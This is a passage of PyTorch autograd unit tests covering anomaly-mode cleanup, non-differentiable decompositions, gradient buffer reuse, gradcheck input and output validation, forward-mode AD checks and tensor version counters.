        # MulBackward's anomaly metadata dict, creating the following reference chain:
        #
        # grad -> MulBackward -> PyObject -> ExpBackward
        #
        with detect_anomaly():
            grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)

        # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
        #
        # (PyObject) -> ExpBackward -> dict -> *Foo*
        #            t ----^        WeakRef ---^
        #
        # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
        # We can test this by seeing whether Foo is not kept alive once t is destroyed
        class Foo(object):
            pass
        my_obj = Foo()
        meta_dict = t.grad_fn.metadata
        meta_dict[0] = my_obj
        ref = weakref.ref(my_obj)
        return t, ref

    t, ref = get_ref()
    self.assertIsNotNone(ref())
    del t
    self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
    """Metadata-dict PyObjects must still be freed after anomaly mode prints a stack."""
    # Test if metadata dict PyObject is properly destroyed
    import weakref

    def get_ref():
        # This is similar to the construction in test_anomaly_assign_parent_cleanup:
        #
        # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
        # out ---^                                 WeakRef ---^
        #
        # We want to check that Foo is still properly destroyed even when MyFunc2Backward's
        # AnomalyMetadata calls printstack, which does some python object manipulation.
        #
        # You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
        # since if PyObject is not destroyed here, wouldn't this test would detect that also?
        # The answer is that custom function's PyObject (THPFunction) actually only hold
        # a weak reference to the c++ node!
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.save_for_backward(x)
                return x

            @staticmethod
            def backward(ctx, gO):
                x, = ctx.saved_tensors
                return MyFunc2.apply(x)

        class MyFunc2(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, gO):
                # NaN gradient deliberately triggers the anomaly-mode error path
                return gO + float("NaN")

        inp = torch.rand(1, requires_grad=True)
        out = MyFunc.apply(inp)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)

        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                with detect_anomaly():
                    ginp.backward()

        class Foo(object):
            pass
        my_obj = Foo()
        meta_dict = out.grad_fn.metadata
        meta_dict[0] = my_obj
        ref = weakref.ref(my_obj)
        return out, ref

    t, ref = get_ref()
    self.assertIsNotNone(ref())
    del t
    self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
    # Backward through torch.eig must be rejected when eigenvectors=False.
    mat = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
    evals, evecs = torch.eig(mat, eigenvectors=False)
    seeds = [torch.ones_like(evals), torch.ones_like(evecs)]
    with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
        torch.autograd.backward([evals, evecs], seeds)
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
    # Backward through torch.eig is rejected when the eigenvalues are complex.
    mat = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
    evals, evecs = torch.eig(mat, eigenvectors=True)
    seeds = [torch.ones_like(evals), torch.ones_like(evecs)]
    with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
        torch.autograd.backward([evals, evecs], seeds)
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
    # Backward through torch.symeig must be rejected when eigenvectors=False.
    mat = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
    evals, evecs = torch.symeig(mat, eigenvectors=False)
    seeds = [torch.ones_like(evals), torch.ones_like(evecs)]
    with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
        torch.autograd.backward([evals, evecs], seeds)
@skipIfNoLapack
def test_svd_no_singularvectors(self):
    # Backward through torch.svd must be rejected when compute_uv=False.
    mat = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
    left, sigma, right = torch.svd(mat, compute_uv=False)
    seeds = [torch.ones_like(left), torch.ones_like(sigma), torch.ones_like(right)]
    with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
        torch.autograd.backward([left, sigma, right], seeds)
def test_no_grad_copy(self):
    """Gradient accumulation may hand the backward's grad buffer to at most
    one input (no copy), and must copy when the incoming grad is
    non-contiguous."""
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None  # data_ptr of the grad seen by backward()

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad.data_ptr()
            return grad, grad

    class NonContGradFunc(Function):
        @staticmethod
        def forward(ctx, inp1):
            ctx.size = inp1.size()
            return torch.tensor([1.])

        @staticmethod
        def backward(ctx, grad):
            # expand() yields a non-contiguous gradient
            return torch.ones(1).expand(ctx.size)

    a = torch.randn(5, 6, requires_grad=True)
    b = torch.randn(5, 6, requires_grad=True)

    # non-contiguous grad should be copied
    NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
    self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
    self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)

    # test case that should trigger no copy for one of a,b
    a.grad = b.grad = None
    MyFunc.apply(a, b)[1][0].backward()
    p_g = MyFunc.static_grad_ptr
    p_a = a.grad.data_ptr()
    p_b = b.grad.data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # check one of them is using the computed buffer
    self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
    """Sparse analogue of test_no_grad_copy: accumulation may reuse the
    backward's sparse values buffer for at most one input, and must copy
    when the sparse grad's indices/values are non-contiguous."""
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None  # data_ptr of the sparse grad's values buffer

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad._values().data_ptr()
            return grad, grad

    class NonContGradFunc(Function):
        static_grad_ptr = None

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            # Create a sparse tensor with non-contiguous indices and values
            # and return as grad.
            v = torch.rand(1, 3)
            i = torch.ones(1, 1, dtype=torch.long)
            nv = v.expand(8, 3)
            ni = i.expand(1, 8)
            ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
            NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
            return ngrad, ngrad

    a = torch.randn(10, 3, requires_grad=True)
    b = torch.randn(10, 3, requires_grad=True)
    input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
    offsets = torch.tensor([0, 4])
    import torch.nn.functional as F

    # test case that should trigger no copy for one of a,b
    emb_matrix = MyFunc.apply(a, b)
    loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
    loss.backward(retain_graph=True)
    p_g = MyFunc.static_grad_ptr
    p_a = a.grad._values().data_ptr()
    p_b = b.grad._values().data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # check one of them is using the computed buffer
    self.assertTrue(p_a == p_g or p_b == p_g)
    # Run backwards multiple times to ensure accumulation works.
    for i in range(10):
        loss.backward(retain_graph=True)

    # non-contiguous indices and value, we should trigger a copy.
    a.grad = b.grad = None
    emb_matrix = NonContGradFunc.apply(a, b)
    loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
    loss.backward(retain_graph=True)
    p_g = NonContGradFunc.static_grad_ptr
    p_a = a.grad._values().data_ptr()
    p_b = b.grad._values().data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # Verify we cloned both grads.
    self.assertFalse(p_a == p_g)
    self.assertFalse(p_b == p_g)
    # Run backwards multiple times to ensure accumulation works.
    for i in range(10):
        loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
    # Sparse inputs are only accepted when check_sparse_nnz=True;
    # otherwise gradcheck raises.
    def total(sparse):
        return torch.sparse.sum(sparse)

    for fast in (True, False):
        gradcheck(total, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True),
                  check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast)
        with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
            gradcheck(total, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True),
                      check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast)
def test_gradcheck_nondeterministic(self):
    """gradcheck must flag non-reentrant backwards unless nondet_tol covers
    the observed jitter."""
    class NonDetFunc(Function):
        @staticmethod
        def forward(ctx, x, jitter=0.0):
            ctx._jitter = jitter
            return x

        @staticmethod
        def backward(ctx, grad_out):
            # randomly scale the gradient by up to `jitter` (relative), so
            # two backward runs disagree whenever jitter > 0
            return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None

    def check(fast_mode):
        inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
        # jitter == 0: deterministic, passes
        gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
            gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
            gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
        # with nondet_tol=1e-5 the same jitters are tolerated
        gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
                  fast_mode=fast_mode)
        gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
                  fast_mode=fast_mode)
        gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
    """Input-validation paths of gradcheck: sparse inputs without
    check_sparse_nnz, inputs that don't require grad, low-precision inputs,
    and zero-stride (expanded) inputs."""
    def check(fast_mode):
        # when inputs are not dense, but check_sparse_nnz is false
        x = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
            gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
                      fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
                                   check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))

        # when none of the inputs require grad (always raises even if raise_exception=False)
        x = torch.rand(10, requires_grad=False)
        with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)

        # (warning) when inputs are not double precision
        x = torch.ones(1, dtype=torch.float32, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
            self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))

        # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
        # even if raise_exception=False)
        x = torch.ones(1, dtype=torch.float64, requires_grad=True)
        x = x.expand((2, 2))
        with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
    """MKLDNN inputs must be rejected when forward-mode AD checking is on."""
    # when mkldnn inputs, forward mode testing is not allowed
    # Update tolerances below to make sure the gradient match even in single precision floats
    # Use the warning assert to hide the float32 warning
    x = torch.ones(1).to_mkldnn().requires_grad_()
    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)

    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
    """Unsupported output layouts (sparse, MKLDNN) always raise, even with
    raise_exception=False."""
    def check(fast_mode):
        # when sparse outputs (always raise even if raise_exception=False)
        x = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
            gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
                      fast_mode=fast_mode)

        # when mkldnn outputs (always raise even if raise_exception=False)
        root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
        with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
            gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
    """When no output is differentiable, the numerical gradient must be zero;
    a function with no outputs at all trivially passes."""
    def check(fast_mode):
        # When none of the outputs are differentiable, but numerical gradient is not zero
        x = torch.ones((1,), requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
            # Fix: this call previously dropped ``fast_mode``, so the raising
            # path was only ever exercised in slow mode.
            gradcheck(lambda x: torch.tensor([x]), x, fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))

        # succeed when no outputs at all
        self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
    # Batched-gradient checking over a sparse input fails at runtime and
    # should either raise or, with raise_exception=False, return False.
    def run(fast_mode):
        inp = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
        # runtime error while compute batched grad (print big error)
        with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
            gradcheck(lambda t: t.to_dense(), (inp,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda t: t.to_dense(), (inp,), check_sparse_nnz=True, check_batched_grad=True,
                                   raise_exception=False, fast_mode=fast_mode))

    run(fast_mode=True)
    run(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
    """Checks on the grad_input returned by backward: sparse dims, scaling
    by grad_output, and layout agreement with the input."""
    # when grad_input is sparse and has incorrect sparse_dim/dense_dim
    def check(fast_mode):
        def fn(x):
            def hook(grad):
                if grad is not None:
                    # re-wrap with sparse_dim=1 to corrupt sparse/dense dims
                    return grad.to_dense().to_sparse(1)
                return grad
            y = x.clone()
            y.register_hook(hook)
            return y.to_dense()
        x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
            gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (non-sparse case)
        def fn2(x):
            y = x.clone()
            # constant offset added to the grad breaks linearity in grad_output
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (sparse case)
        def fn3(x):
            y = x.clone().to_dense()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when layout of grad_input is not the same as input
        class Test(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, x):
                return x.to_sparse()
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
            gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
    # gradcheck must report backward functions that cannot handle undefined
    # (None) output gradients.
    def run(fast_mode):
        def func(t):
            def reject_undefined(g):
                if g is None:
                    raise RuntimeError("x is undefined")
            out = t.clone()
            out.register_hook(reject_undefined)
            return out

        inp = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
            with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
                gradcheck(func, (inp,), fast_mode=fast_mode)
            self.assertFalse(gradcheck(func, (inp,), raise_exception=False, fast_mode=fast_mode))

    run(fast_mode=True)
    run(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
    """Analytical-vs-numerical Jacobian mismatches for real and complex
    functions (the complex cases here are explicitly run with
    fast_mode=False)."""
    def check(fast_mode):
        def fn(x):  # R -> R, C -> C
            y = x.clone()
            # constant offset perturbs the analytical gradient so it no
            # longer matches the numerical one
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn, (x,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))

        x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))

        def fn2(x):  # R -> C
            y = torch.complex(x, x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(2, 2, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
            gradcheck(fn2, (x,), fast_mode=False)
        self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))

        def fn3(x):  # C -> R
            y = torch.real(x)
            y.register_hook(lambda x: x + 1e-2)
            return y
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(fn3, (x_c,), fast_mode=False)
        self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
    # A mix of dense and sparse tensor inputs passes gradcheck when
    # check_sparse_nnz is enabled.
    def mul_dense(dense, sparse):
        return dense * sparse.coalesce().to_dense()

    for fast in (True, False):
        dense = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
        sparse = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
        self.assertTrue(gradcheck(mul_dense, (dense, sparse), check_sparse_nnz=True,
                                  check_batched_grad=False, fast_mode=fast))
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
    """gradcheck with one or several MKLDNN inputs (float32, hence the loose atol)."""
    def check(fast_mode):
        # one dense + one mkldnn input
        def fn(x, y):
            return x + y.to_dense()
        a = torch.rand(10, requires_grad=True)
        b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
        self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))

        # two mkldnn inputs
        def fn2(x, y):
            return x.to_dense() + y.to_dense()
        c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
        # Fix: this previously called ``fn`` with ``(a, c)`` again, leaving
        # ``fn2`` unused and the two-mkldnn-input case untested.
        self.assertTrue(gradcheck(fn2, (b, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
    # gradcheck must detect functions whose output shape or dtype changes
    # when the input is perturbed.
    def run(fast_mode):
        def shape_changes(t):
            return torch.cat([t, t]) if torch.all(t >= 1) else t

        inp = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
            self.assertTrue(gradcheck(shape_changes, (inp,), fast_mode=fast_mode))

        def dtype_changes(t):
            return t.to(torch.float32) if torch.all(t >= 1) else t

        with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
            self.assertTrue(gradcheck(dtype_changes, (inp,), fast_mode=fast_mode))

    run(fast_mode=True)
    run(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
    """gradcheck handles functions returning a mix of complex and real outputs."""
    def fn(x, y):
        z = torch.complex(x, y)
        return z, x + 1
    a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
    self.assertTrue(gradcheck(fn, (a, b)))

    def fn2(z):
        return z, torch.real(z)
    c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
    # Fix: ``(c)`` is just ``c`` parenthesized, not a tuple. gradcheck also
    # accepts a lone tensor so behavior was unchanged, but ``(c,)`` is what
    # was intended and matches the call style above.
    self.assertTrue(gradcheck(fn2, (c,)))
def test_gradcheck_get_numerical_jacobian(self):
    """Deprecated `get_numerical_jacobian` still works but emits a warning,
    and only supports grad_out=1.0."""
    # get_numerical_jacobian is deprecated and no longer used internally by gradcheck
    from torch.autograd.gradcheck import get_numerical_jacobian

    def fn(inputs):
        # get_numerical_jacobian requires fn to take inputs as a tuple
        # and returns the jacobian wrt the first output
        x = inputs[0]
        y = inputs[1]
        return 2 * x + y, x + 2 * y

    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)

    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        # jacobian of the first output wrt `a` only (target=a)
        jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))

    with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
        # jacobian of the first output wrt all inputs
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
    self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
    """Deprecated `get_analytical_jacobian` still works, reports
    non-reentrant backwards, and only supports grad_out=1.0."""
    from torch.autograd.gradcheck import get_analytical_jacobian

    def fn(x, y):
        return 2 * x + y, x + 2 * y

    a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
    b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)

    outputs = fn(a, b)
    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
    self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
    self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
    self.assertTrue(reentrant)

    class NonDetFunc(Function):
        @staticmethod
        def forward(ctx, x, jitter=0.0):
            ctx._jitter = jitter
            return x

        @staticmethod
        def backward(ctx, grad_out):
            # non-deterministic backward: gradient randomly scaled by up to `jitter`
            return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None

    outputs = NonDetFunc.apply(a, 1e-6)
    with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
        jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
    self.assertFalse(reentrant)

    with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
        jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
    from torch.autograd.gradcheck import GradcheckError

    def run(fast_mode):
        def leaky(t):
            out = t.clone()
            out.register_hook(lambda g: g + 1e-2)
            return out

        inp = torch.ones(2, 2, requires_grad=True)
        # The same failure is catchable both as GradcheckError and as
        # RuntimeError.
        with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(leaky, (inp,), fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
            gradcheck(leaky, (inp,), fast_mode=fast_mode)
        self.assertFalse(gradcheck(leaky, (inp,), raise_exception=False, fast_mode=fast_mode))

        def always_raises(t):
            raise RuntimeError("Not a GradcheckError!")

        # Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
        with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
            gradcheck(always_raises, (inp,), fast_mode=fast_mode, raise_exception=False)

    run(fast_mode=True)
    run(fast_mode=False)
def test_gradcheck_forward_ad(self):
    """check_forward_ad catches forward-mode Jacobian mismatches across
    real/complex input-output combinations."""
    def fn(x, y):
        return x + y, y

    def bad_fn(x, y):
        # Hacky way to check if we're currently inside a forward ad level
        is_running_forward_ad = fwAD._current_level >= 0

        if is_running_forward_ad:
            # scale only the tangent so forward mode disagrees with backward mode
            y_p, y_d = fwAD.unpack_dual(y)
            y = fwAD.make_dual(y_p, y_d * 1.1)

        return x + y, y

    err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"

    for fast_mode in [True, False]:
        # Test for all inputs and outputs being real
        x = torch.rand(2, dtype=torch.double, requires_grad=True)
        y = torch.rand(2, dtype=torch.double, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        def basic_mul(x):
            return torch.view_as_real(torch.resolve_conj(x * 1j))
        gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)

        # Test for one input and one output being complex
        x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)

        # Test for all inputs and outputs being complex
        y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)

        gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, err_msg):
            gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
    """Semantics of the `_version` counter across in-place ops, views, and
    `.data` assignment."""
    x = torch.randn(1, 2)

    # In-place op bumps version
    x_saved_version = x._version
    x.add_(1).add_(1)
    self.assertTrue(x._version > x_saved_version)

    # Differentiable view shares version counter
    xz = x[:]
    self.assertTrue(x._version == xz._version)
    xz.add_(1)
    self.assertTrue(x._version == xz._version)

    # `x.data = y` preserves version counter of `x`
    x_saved_version = x._version
    x.data = torch.randn(2, 3)
    self.assertTrue(x._version == x_saved_version)
    x.add_(1)
    self.assertTrue(x._version > x_saved_version)

    # Make sure `x` is still using the same version counter it shares with `xz`
    self.assertTrue(x._version == xz._version)

    # In-place op on `xz` also updates version of `x`,
    # because they share the version counter
    xz.add_(1)
    self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
    # Dense tensors are backed by `TensorImpl` while sparse tensors use
    # `SparseTensorImpl`; assigning `.data` across the two must fail.
    dense = torch.randn(1, 2)
    sparse = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
    with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
        dense.data = sparse
